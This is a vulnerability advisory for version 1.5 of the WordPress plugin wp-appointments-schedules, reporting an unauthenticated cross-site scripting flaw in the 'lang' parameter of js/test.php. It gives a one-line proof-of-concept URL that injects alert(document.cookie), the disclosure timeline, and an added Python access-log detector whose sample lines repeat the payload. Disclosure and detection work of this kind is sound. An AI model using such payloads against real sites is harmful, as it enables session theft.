wp-plugin : wp-appointments-schedules

Plugin Details
Plugin Name: wp-plugin : wp-appointments-schedules
Affected Version : 1.5 (and most probably lower versions, if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :
http://localhost/wp-content/plugins/wp-appointments-schedules/js/test.php?lang=">alert(document.cookie)&

 

Vulnerable Parameter : lang
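
Detection example (added here, not part of the original advisory or the plugin's code): a Python check that flags access-log requests to the test.php path above whose lang value is not a plain locale code, including double-encoded values. The combined log format, the locale pattern and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Path and parameter as given in the advisory above.
VULN_PATH = "/wp-content/plugins/wp-appointments-schedules/js/test.php"
PARAM = "lang"
# Assumption: a legitimate value is a plain locale code such as "en" or "en_US".
SAFE_LANG = re.compile(r"^[A-Za-z]{2,3}([_-][A-Za-z0-9]{2,8})*$")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range, not real traffic).
_PREFIX = '203.0.113.9 - - [12/Jun/2014:10:00:00 +0000] "GET '
SAMPLE_LOG = [
    _PREFIX + VULN_PATH + '?lang=en_US HTTP/1.1" 200 512',
    _PREFIX + VULN_PATH + '?lang=%22%3Ealert(document.cookie)& HTTP/1.1" 200 540',
    _PREFIX + VULN_PATH + '?lang=%2522%253Ex HTTP/1.1" 200 530',
    _PREFIX + '/index.php?lang=%22%3E HTTP/1.1" 200 100',
]


def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_lang(log_line):
    """Return the decoded lang value when the line requests test.php with a
    value that is not a plain locale code; otherwise return None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if unquote(url.path).lower() != VULN_PATH:
        return None
    # parse_qs decodes once; fully_decode handles any further encoding layers.
    for raw in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
        value = fully_decode(raw)
        if not SAFE_LANG.match(value):
            return value
    return None


if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(repr(suspicious_lang(entry)))
```

The same allow-list idea applies on the server side: a lang value that does not match a locale pattern can be rejected before it reaches any output.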


Disclosure Timeline
Vendor Contacted : 2014-01-17
Plugin Status : Updated on
Public Disclosure : June 12, 2014
CVE Number : CVE-2014-4579
Plugin Description :
This WordPress plugin will let you create and manage schedules. You can add, delete, and manage appointments for each schedule. Individual schedules can be displayed on the website and may be enabled to allow online reservations by registered users. To add a schedule to a page add "[[DISPLAYSCHEDULE_PAUL]]" to the post in the page of interest for a schedule created with the name "Paul".